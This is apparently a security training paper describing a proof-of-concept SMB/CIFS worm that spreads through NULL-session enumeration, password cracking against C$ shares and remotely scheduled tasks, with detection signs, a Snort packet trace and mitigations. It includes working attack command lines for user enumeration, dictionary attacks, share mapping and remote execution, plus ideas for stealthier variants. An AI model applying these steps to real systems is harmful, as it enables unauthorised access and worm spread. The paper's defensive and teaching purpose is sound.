The following is summarized from Windows NT/2000 Network Security [5] :
A SMB Session is established in four stages:
1) A session request block message is sent to a computer with the IP address of the computer wanting to make the connection. A TCP connection is established between the two computers on port 139.A packet analysis from Snort clearly showing these stages as the worm makes its NULL session connection is shown in the appendix. Note that throughout most of this process, the client has been responsible for indicating the level of security it would like to have in place!
2) Secondly, the client submits a list of protocol versions it understands, so the server can pick one of them to use. If this negotiation fails the TCP connection is dropped.
3) Thirdly, the client tries to establish an SMB session by sending a session setup request to the server.
4) Lastly, the server locates the resource the client is trying to connect to, connecting the client with the resource. The client acknowledges that it has successfully attached to the resource with a message when the connection is in place.
I am not aware of another worm that spreads using the techniques employed by the bh01 worm, although they are certainly not new.
The name enumeration and password cracking capabilities are derived from the program "enum.exe" written by Jordan Ritter jpr5@darkridge.com [6], although another tool that could achieve the similar results is the "net.exe" program in Windows.
I obtained the idea for using the task scheduler to start up the worm process on the remote machine from the book "Hacking Exposed" [7]. This can be achieved from the command line by using the "at.exe" command.
The password cracking methodology used in the worm was outlined in a paper analysing the Morris Internet worm [8].
When the bh01worm is first run on a compromised machine it sets itself up as a Windows service. This ensures that it will be automatically restarted in the event of a system reboot.
As soon as the bh01worm.exe program is started, it fires off a thread in order to handle the propagation process. This thread starts off by examining the local network address space, trying to spread to as many machines as it can locally. Each time the worm compromises an IP address on the local network, it divides the remaining internal address space in half, and then hands half of the network addresses to the copy of the worm on the compromised computer. After it has exhausted its attempt to compromise vulnerable machines on the local, then sits in an infinite loop trying to compromise random external IP addresses (being careful to check that it is neither an internal address nor an address that will not propagate 10.x.x.x or 192.168.x.x address). The original plan was for the worm to maintain state so that if the host computer was rebooted it would know what its progress was to date, to avoid attacking computers it had already compromised, although this has not been implemented due to time constraints.
When the worm tries to compromise a machine, the very first thing it does is try to establish a NULL session with it. This tells it whether the machine it is attacking supports the CIFS protocol and is likely to be a Windows machine. It then immediately disconnects and then uses the SMB protocol to enumerate the list of account names on the remote machine. It also establishes some basic properties about the user, whether the user has no password and the comment field. At present it does not do anything with this information, although the potential is there to use it in the password guessing process.
Once it has gathered this information, it starts trying to establish SMB connections with the target computers, attempting to access the C$ connection. The worm deliberately tries to exploit two flaws in the CIFS/SMB implementation here: Firstly, it can try connecting to this share as many times as it wants without triggering the account lockout security feature. Secondly, there is a vulnerability in the SMB protocol stack on Windows machines where a large number of connection attempts arriving very quickly can "confuse" the authentication process and potentially allow a invalid account to connect.
I had originally intended to implement some attack enhancements proposed by Hobbit in his excellent paper "CIFS – Common Insecurities Fail Scrutiny" [9]. I had wanted to take advantage of the AndX extension to the SMB protocol that allows multiple requests to be sent in parallel as well as have multiple threads attempt the password guessing in parallel. The worm should also only submit the weakest protocols during the protocol negotiation phase, in order to maximise its chances of exploiting the target. Alas, I ran out of time.
There are four stages to the password attack: During the first phase, a blank password and various combinations of the user name are tried. During the second phase, it tries a short list of commonly used passwords embedded within the worm code. The third phase is a dictionary attack, if a file exists in the root directory of the C drive called "dict.txt". The last phase is a brute force password-guessing phase. This continues until a valid password is found, or the worm runs out of combinations.
If an account is cracked, an attempt is made to connect the C$ share on the remote machine to the local machine. Note that the share names that end with a ‘$' are "hidden" shares, in that they don't get displayed in an enumeration of the available shares on a machine, yet they still exist. The C$ share is a system-created hidden share that is always available even if the C drive is not explicitly shared by the user. The worm tries to map the remote C$ share to the V: drive locally, so if this is already connected to something the connection will fail.
If a connection to the C$ share succeeds, the worm attempts to copy itself over to the remote machine. If this is successfully achieved, the worm attempts to use DCOM to remotely schedule a job to run the copy of itself on the target machine. The cracked account details are used to run the job on the remote machine. The job is scheduled to run after 1 minute of idle time or 3 minutes whichever comes first [10].
Note that if the Task Scheduler service is not active the DCOM part of the attack will fail. If this happens, the worm deletes the copy of itself from the infected machine in an attempt to remove evidence of its presence.
The worm contains code to register itself as a service on the remote machine to be automatically run upon system boot. This way the worm can survive system downtime. If the worm is copied onto a host within the local network, then the worm is also given command line parameters to tell it what range of IP addresses within the local network to start attacking. If the worm is copied onto a machine on a different network, the worm is given a command line parameter that tells it to start attacking all the IP addresses on the local network (computed by examining the local machine's IP address and subnet mask). The command line parameter is "-T" and can be specified as a range, as in "–T:192.168.1.1-192.168.1.254", as a single IP address, as in "-T:192.168.1.8", or as a comma separated list of IP addresses.
To contain the spread of the worm during system testing (and to aid with debugging), the worm was developed with a form of "lysine deficiency" (a concept proposed in the book " Jurassic Park ", and applied to worms in a paper by Caezar [11]). The worm regularly opens a connection with a "lysine provider" (a server running on a port at a defined IP address), and passes a string to the server telling it what it is currently doing, as well as obtaining permission to keep living. If the connection is not made, or if the server refuses permission, then the worm dies off. This mechanism allowed me to ensure the worm would not spread out of control, and also to monitor how many copies of the worm were in existence and how quickly it was spreading.
A service called "bh01worm" will appear in your Services administrative tool.
There will be a running process called "bh01worm" in the task manager.
The file "bh01worm.exe" will be in the root directory of the infected machine. There may also be a file called "dict.txt" that contains a cracking dictionary.
There may be a completed task in your scheduled task list (Start->Settings->Control Panel->Scheduled Tasks called "bh01worm".
A COM control is added to the registry called "Lysine Dependency". The service "bh01worm" is also added to the registry.
There will be SMB NULL session attempts to all the machines in your local address space, as well as random machines on the Internet.
There will be a large number of attempts to connect to the C$ share with rapidly changing passwords.
I have included a network packet signature for the worm in the appendix as a Snort trace. The string "\WINNT\Tasks\bh01_worm.job" is embedded in Unicode within some packets that are transmitted by the attacking worm during the DCOM Task Schedular phase of the attack.
Note that I have made no attempt to have the worm cover its tracks once it has compromised a system, although Greg Hoglund of the NTRootKit project [12] has documented several excellent ways to hide out under NT.
An infected computer finds a computer that responds to a NULL session connection attempt while probing its local address space.

The infected computer responds by enumerating a list of account names on the target machine, and then by rapidly trying to attach to C$ share on the target computer, trying to crack the password for an account with sufficient privileges.

If access is achieved the worm binary is copied across to the target machine and a task is scheduled to activate the worm via DCOM.
Note that you don't need a copy of the worm to exploit these weaknesses in the CIFS/SMB layer! You can use the enum program to enumerate users and shares on a remote machine.
The command line "enum –U 192.168.1.1" will list the usernames on the remote machine.
You can the use the "–D" parameter to attempt a dictionary attack on the remote machine.
C:\> enum –D –u <username> -f <dictionary> |
Once you have cracked an account, you can use the command below to connect to it, or use explorer to map it as a drive.
C:\> net use \\Target\C$ password /user:username |
You can then copy a program over to the target machine.
To run the target remotely, try executing the command line
C:\> at \\192.168.1.1 19:30P ""remote /s cmd secret"" |
To test the worm, you need to first start up the lysine dispenser program. You can then start up the worm with the command line:
C:\> bh01worm.exe –T:<TargetIP> –P:<ProviderIP> |
Where <TargetIP> is the IP address of the machine you are attacking, and <ProviderIP> is the IP address of the machine running the lysine dispenser program.
The worm must be located in the root directory of the C drive, with a dictionary file called "dict.txt" also in the root directory.
Because the worm exploits flaws in the underlying Windows networking model, these vulnerabilities are hard to prevent without potentially breaking a large number of Windows applications. If you do not depend on the service, you should disable the Task Scheduler service from running. Simply go into "Start->Settings->Control Panel->Administrative Tools->Services" and double-click "Task Scheduler". Change the Startup type from "Automatic" to "Disabled", and then click the "Apply" button. Click the "Stop" button, and then click "OK".

Of course, in this day and age host-based perimeter defenses are absolutely critical, although the attack may not be detected if coming from a machine where a trust relationship has already been established.
Ingress and Egress filters should be in place on the corporate firewall to stop the worm from entering or exiting through the firewall.
Because this worm runs as a service, it could potentially be introduced into a corporate LAN from a notebook computer or a VPN-attached computer.
The scary thing is how easy it was to create this worm. Admittedly, I have had a lot of experience with network coding, but there are also many excellent code examples to draw on and a lot of excellent papers that have been written. With little effort I have created something that exploits a few weaknesses in the CIFS/SMB protocol and has the potential to be positively devastating if it was released in the wild.
Imagine what could happen if there was to be more work put into this, and rootkit-like capabilities introduced into the worm, so the worm could hide out on compromised machines and be almost undetectable. The worm could encrypt the compromised systems IP address and account details into a newsgroup post, allowing an intruder to gain access to the information in an untraceable way. The methods of compromising a system could be expanded to not only include methods Hobbit outlined in his CIFS paper, but also other methods that exploit vulnerabilities in the Windows networking model. The worm could use privilege-escalation to increase its level of access until it was able to install itself properly. The worm could also act as a keystroke monitor or sniffer trying to compromise password sent over the wire or typed in at the console.
Microsoft has traditionally sacrificed network security for ease of use, and this compromise has paid off in the past in terms of market share. The CIFS networking model seems to have been based around a world of trust, where a server and a client can cooperate in establishing a connection with the appropriate level of security, where it is perfectly acceptable to broadcast information about the computer and the services it provides to whoever is listening. Where the server trusts that the IP address a client has provided for it is correct and will blindly establish a connection with that IP address. We now have a situation where there is a large homogenous computer base perfect for malware to thrive in, underpinned by an insecure networking protocol. How much longer can these shaky foundations last in an interconnected world?
[1] Oreilly Network: Ramen Worm attacks Red Hat Linux Machines, 22-1-2001 , URL: http://oreilly.linux.com/pub/a/linux/2001/01/22/insecurities.html
[2] SANS Global Incident Analysis Center , Lion Worm, 29-3-2001 , URL: http://www.sans.org/y2k/lion.htm
[3] Kehoe, Brendan P, "Zen and the Art of the Internet: A Beginners Guide to the Internet", First Edition, January 1992, Section: The Internet Worm URL: http://sunland.gsfc.nasa.gov/info/guide/The_Internet_Worm.html
[4] Siyan, K, "Windows 2000 TCP/IP", New Riders Publishing, Second Edition, August 2000, page 28
[5] Schultz, E. Eugene , "Windows NT/2000 Network Security", First Edition, August 2000, MacMillan Technical Publishing
[6] Ritter , Jordan , "enum source code" URL: http://www.darkridge.com/~jpr5/dist/enum.tar.gz
[7] McClure, S Scambray , J & Kurtz, G, "Hacking Exposed – Network Security Secrets & Solutions", Osborne/McGraw Hill, Copyright 1999
[8] Seeley, Don, "A Tour of the Worm", URL: http://kt-www.cs.titech.ac.jp/~natori/…/wormtour.html
[9] *Hobbit*, Avian Research, hobbit@avian.org , , January 1997, "CIFS: Common Insecurities Fail Scrutiny" URL: http://www.avian.org
[10] Microsoft Corporation, "ITaskScheduler", URL: http://msdn.microsoft.com/library/psdk/taskschd/ts_itaskscheduler_9cfm.htm
[11] Caezar, "Caezar's Lysine Deficiency", URL: http://207.173.52.49/papers/Lysinedeficiencies.txt
[12] Hoglund, Greg, "__==__--rootkit--__==__", URL: http://www.rootkit.com
[13] Schmidt, Jeff, "Microsoft Windows 2000 Security Handbook", Que Corporation, Copyright 2000
[14] Microsoft Corporation, "Restricting Information Available to Anonymous Logon Users" URL: http://support.microsoft.com/support/kb/articles/Q143/4/74.asp
Snort output showing initial NULL session connection establishment followed by immediate disconnect. The attacking machine is IP address 192.168.1.35 while the target is 192.168.1.8. Note that this would appear to be indistinguishable from legitimate NULL session connections within your corporate network, except for the fact that the session is torn down as soon as it is established.
04/05-01:29:31.749146 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2493 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4CF58C Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.749286 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32565 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xB00C983C Ack: 0xB4CF58D Win: 0x4470 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.749418 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2494 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB4CF58D Ack: 0xB00C983D Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.749717 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2495 IpLen:20 DgmLen:177 DF
***AP*** Seq: 0xB4CF58D Ack: 0xB00C983D Win: 0x4470 TcpLen: 20
00 00 00 85 FF 53 4D 42 72 00 00 00 00 18 53 C8 .....SMBr.....S.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE ................
00 00 00 00 00 62 00 02 50 43 20 4E 45 54 57 4F .....b..PC NETWO
52 4B 20 50 52 4F 47 52 41 4D 20 31 2E 30 00 02 RK PROGRAM 1.0..
4C 41 4E 4D 41 4E 31 2E 30 00 02 57 69 6E 64 6F LANMAN1.0..Windo
77 73 20 66 6F 72 20 57 6F 72 6B 67 72 6F 75 70 ws for Workgroup
73 20 33 2E 31 61 00 02 4C 4D 31 2E 32 58 30 30 s 3.1a..LM1.2X00
32 00 02 4C 41 4E 4D 41 4E 32 2E 31 00 02 4E 54 2..LANMAN2.1..NT
20 4C 4D 20 30 2E 31 32 00 LM 0.12.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.759736 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32566 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xB00C983D Ack: 0xB4CF616 Win: 0x43E7 TcpLen: 20
00 00 00 55 FF 53 4D 42 72 00 00 00 00 98 53 C8 ...U.SMBr.....S.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE ................
00 00 00 00 11 05 00 03 0A 00 01 00 04 11 00 00 ................
00 00 01 00 00 00 00 00 FD E3 00 80 C0 53 96 0B .............S..
1C BD C0 01 A8 FD 00 10 00 4F 03 63 73 54 2B A9 .........O.csT+.
4B BF F0 7E 75 94 EB 0C 77 K..~u...w
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.835338 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2496 IpLen:20 DgmLen:208 DF
***AP*** Seq: 0xB4CF616 Ack: 0xB00C9896 Win: 0x4417 TcpLen: 20
00 00 00 A4 FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs.......
77 61 72 65 50 61 67 65 45 78 00 90 00 00 FF FE warePageEx......
00 00 10 00 0C FF 00 A4 00 04 11 0A 00 00 00 00 ................
00 00 00 20 00 00 00 00 00 D4 00 00 80 69 00 4E ... .........i.N
54 4C 4D 53 53 50 00 01 00 00 00 97 82 00 E0 00 TLMSSP..........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 ...............g
57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 W.i.n.d.o.w.s. .
32 00 30 00 30 00 30 00 20 00 32 00 31 00 39 00 2.0.0.0. .2.1.9.
35 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 5...W.i.n.d.o.w.
73 00 20 00 32 00 30 00 30 00 30 00 20 00 35 00 s. .2.0.0.0. .5.
2E 00 30 00 00 00 00 00 ..0.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.854893 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32567 IpLen:20 DgmLen:269 DF
***AP*** Seq: 0xB00C9896 Ack: 0xB4CF6BE Win: 0x433F TcpLen: 20
00 00 00 E1 FF 53 4D 42 73 16 00 00 C0 98 07 C8 .....SMBs.......
77 61 72 65 50 61 67 65 45 78 00 90 00 00 FF FE warePageEx......
00 08 10 00 04 FF 00 E1 00 00 00 6C 00 B6 00 4E ...........l...N
54 4C 4D 53 53 50 00 02 00 00 00 08 00 08 00 30 TLMSSP.........0
00 00 00 95 82 82 E0 66 77 C0 AB 3D 3C A7 00 00 .......fw..=<...
00 00 00 00 00 00 00 34 00 34 00 38 00 00 00 50 .......4.4.8...P
00 4C 00 41 00 59 00 02 00 08 00 50 00 4C 00 41 .L.A.Y.....P.L.A
00 59 00 01 00 08 00 50 00 4C 00 41 00 59 00 04 .Y.....P.L.A.Y..
00 08 00 70 00 6C 00 61 00 79 00 03 00 08 00 70 ...p.l.a.y.....p
00 6C 00 61 00 79 00 00 00 00 00 00 57 00 69 00 .l.a.y......W.i.
6E 00 64 00 6F 00 77 00 73 00 20 00 35 00 2E 00 n.d.o.w.s. .5...
30 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 0...W.i.n.d.o.w.
73 00 20 00 32 00 30 00 30 00 30 00 20 00 4C 00 s. .2.0.0.0. .L.
41 00 4E 00 20 00 4D 00 61 00 6E 00 61 00 67 00 A.N. .M.a.n.a.g.
65 00 72 00 00 e.r..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.870701 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2497 IpLen:20 DgmLen:264 DF
***AP*** Seq: 0xB4CF6BE Ack: 0xB00C997B Win: 0x4332 TcpLen: 20
00 00 00 DC FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs.......
77 61 72 65 50 61 67 65 45 78 00 90 00 00 FF FE warePageEx......
00 08 20 00 0C FF 00 DC 00 04 11 0A 00 00 00 00 .. .............
00 00 00 59 00 00 00 00 00 D4 00 00 80 A1 00 4E ...Y...........N
54 4C 4D 53 53 50 00 03 00 00 00 01 00 01 00 48 TLMSSP.........H
00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 40 .......I.......@
00 00 00 00 00 00 00 40 00 00 00 08 00 08 00 40 .......@.......@
00 00 00 10 00 10 00 49 00 00 00 95 8A 80 E0 58 .......I.......X
00 45 00 4E 00 41 00 00 7F 9C 0E DE 87 84 76 8A .E.N.A........v.
43 B6 F3 A1 D3 95 0C 20 57 00 69 00 6E 00 64 00 C...... W.i.n.d.
6F 00 77 00 73 00 20 00 32 00 30 00 30 00 30 00 o.w.s. .2.0.0.0.
20 00 32 00 31 00 39 00 35 00 00 00 57 00 69 00 .2.1.9.5...W.i.
6E 00 64 00 6F 00 77 00 73 00 20 00 32 00 30 00 n.d.o.w.s. .2.0.
30 00 30 00 20 00 35 00 2E 00 30 00 00 00 00 00 0.0. .5...0.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.895941 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32568 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0xB00C997B Ack: 0xB4CF79E Win: 0x425F TcpLen: 20
00 00 00 75 FF 53 4D 42 73 00 00 00 00 98 07 C8 ...u.SMBs.......
77 61 72 65 50 61 67 65 45 78 00 90 00 00 FF FE warePageEx......
00 08 20 00 04 FF 00 75 00 00 00 00 00 4A 00 4E .. ....u.....J.N
57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 W.i.n.d.o.w.s. .
35 00 2E 00 30 00 00 00 57 00 69 00 6E 00 64 00 5...0...W.i.n.d.
6F 00 77 00 73 00 20 00 32 00 30 00 30 00 30 00 o.w.s. .2.0.0.0.
20 00 4C 00 41 00 4E 00 20 00 4D 00 61 00 6E 00 .L.A.N. .M.a.n.
61 00 67 00 65 00 72 00 00 a.g.e.r..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.896383 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2498 IpLen:20 DgmLen:132 DF
***AP*** Seq: 0xB4CF79E Ack: 0xB00C99F4 Win: 0x42B9 TcpLen: 20
00 00 00 58 FF 53 4D 42 75 00 00 00 00 18 07 C8 ...X.SMBu.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE ................
00 08 30 00 04 FF 00 58 00 08 00 01 00 2D 00 00 ..0....X.....-..
5C 00 5C 00 31 00 39 00 32 00 2E 00 31 00 36 00 \.\.1.9.2...1.6.
38 00 2E 00 31 00 2E 00 38 00 5C 00 49 00 50 00 8...1...8.\.I.P.
43 00 24 00 00 00 3F 3F 3F 3F 3F 00 C.$...?????.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.896731 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32569 IpLen:20 DgmLen:100 DF
***AP*** Seq: 0xB00C99F4 Ack: 0xB4CF7FA Win: 0x4203 TcpLen: 20
00 00 00 38 FF 53 4D 42 75 00 00 00 00 98 07 C8 ...8.SMBu.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 FF FE ................
00 08 30 00 07 FF 00 38 00 01 00 FF 01 00 00 FF ..0....8........
01 00 00 07 00 49 50 43 00 00 00 00 .....IPC....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.902626 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2499 IpLen:20 DgmLen:83 DF
***AP*** Seq: 0xB4CF7FA Ack: 0xB00C9A30 Win: 0x427D TcpLen: 20
00 00 00 27 FF 53 4D 42 74 00 00 00 00 18 07 C8 ...'.SMBt.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE ................
00 08 40 00 02 FF 00 00 00 00 00 ..@........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.903053 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32570 IpLen:20 DgmLen:83 DF
***AP*** Seq: 0xB00C9A30 Ack: 0xB4CF825 Win: 0x41D8 TcpLen: 20
00 00 00 27 FF 53 4D 42 74 00 00 00 00 98 07 C8 ...'.SMBt.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE ................
00 08 40 00 02 FF 00 27 00 00 00 ..@....'...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.903375 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2500 IpLen:20 DgmLen:79 DF
***AP*** Seq: 0xB4CF825 Ack: 0xB00C9A5B Win: 0x4252 TcpLen: 20
00 00 00 23 FF 53 4D 42 71 00 00 00 00 18 07 C8 ...#.SMBq.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 FF FE ................
00 08 50 00 00 00 00 ..P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.904325 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32571 IpLen:20 DgmLen:79 DF
***AP*** Seq: 0xB00C9A5B Ack: 0xB4CF84C Win: 0x41B1 TcpLen: 20
00 00 00 23 FF 53 4D 42 71 00 00 00 00 98 07 C8 ...#.SMBq.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 FF FE ................
00 08 50 00 00 00 00 ..P....
04/05-01:29:31.905216 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2501 IpLen:20 DgmLen:40 DF
***A***F Seq: 0xB4CF84C Ack: 0xB00C9A82 Win: 0x422B TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.905317 192.168.1.8:445 -> 192.168.1.35:1050
TCP TTL:128 TOS:0x0 ID:32572 IpLen:20 DgmLen:40 DF
***A***F Seq: 0xB00C9A82 Ack: 0xB4CF84D Win: 0x41B1 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
04/05-01:29:31.905470 192.168.1.35:1050 -> 192.168.1.8:445
TCP TTL:128 TOS:0x0 ID:2502 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB4CF84D Ack: 0xB00C9A83 Win: 0x422B TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
|
|
The Best Information Security conference I have attended yet.
-Chris Bimson, Compass Systems, Inc.
Real life - real solutions changed the way I look at security.
-Richard B. Williams, US Army ALTESS
A significant amount of information but with the information so well documented in the books, this will become a valuable reference tool for me in the future
-Rick Funaro, KAPL, Inc
SANS always provides the best training and trainers with a vast amount of knowledge.
-Mike Brennan, SSIC
SANS training is like a catalyst. It not only boosts your knowledge but also inspires you to learn more.
-Tan Koon Yaw, IDA
SANS always provides the best training and trainers with a vast amount of knowledge.
-Mike Brennan, SSIC